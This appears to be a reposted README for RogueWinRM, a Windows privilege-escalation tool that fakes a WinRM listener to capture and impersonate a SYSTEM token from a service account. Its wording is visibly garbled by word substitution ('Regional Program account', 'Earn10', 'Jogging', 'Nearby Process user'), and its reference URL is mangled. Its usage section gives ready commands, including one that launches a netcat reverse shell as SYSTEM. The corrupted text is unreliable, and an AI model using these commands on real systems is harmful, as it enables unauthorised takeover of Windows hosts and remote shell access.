RogueWinRM – Windows Local Privilege Escalation From Service Account To System
RogueWinRM is a regional privilege escalation exploit that enables to escalate from a Service account (with SeImpersonatePrivilege) to Regional Program account if WinRM assistance is not operating (default on Earn10 but NOT on Windows Server 2019).
Briefly, it will hear for incoming connection on port 5985 faking a genuine WinRM support.
It is really just a negligible webserver that will consider to negotiate an NTLM authentication with any service that are making an attempt to hook up on that port.
Then the BITS assistance (operating as Community System) is triggered and it will test to authenticate to our rogue listener. Once authenticated to our rogue listener, we are equipped to impersonate the Nearby Process user spawning an arbitrary system with those privileges.
You can discover a whole technological description of this vulnerability at this url –> https://decoder.cloud/2019/12/06/we-considered-they-were being-potatoes-but-they-ended up-beans/
Use
RogueWinRM
Obligatory args:
-p : method to launch
Optional args:
-a : command line argument to pass to system (default NULL)
-l : listening port (default 5985 WinRM)
-d : Enable Debugging output
Examples
Jogging an interactive cmd:
RogueWinRM.exe -p C:windowssystem32cmd.exe
Operating netcat reverse shell:
RogueWinRM.exe -p C:windowstempnc64.exe -a "10...1 3001 -e cmd"
Authors
- Antonio Cocomazzi
- Andrea Pierini
- Roberto (0xea31)
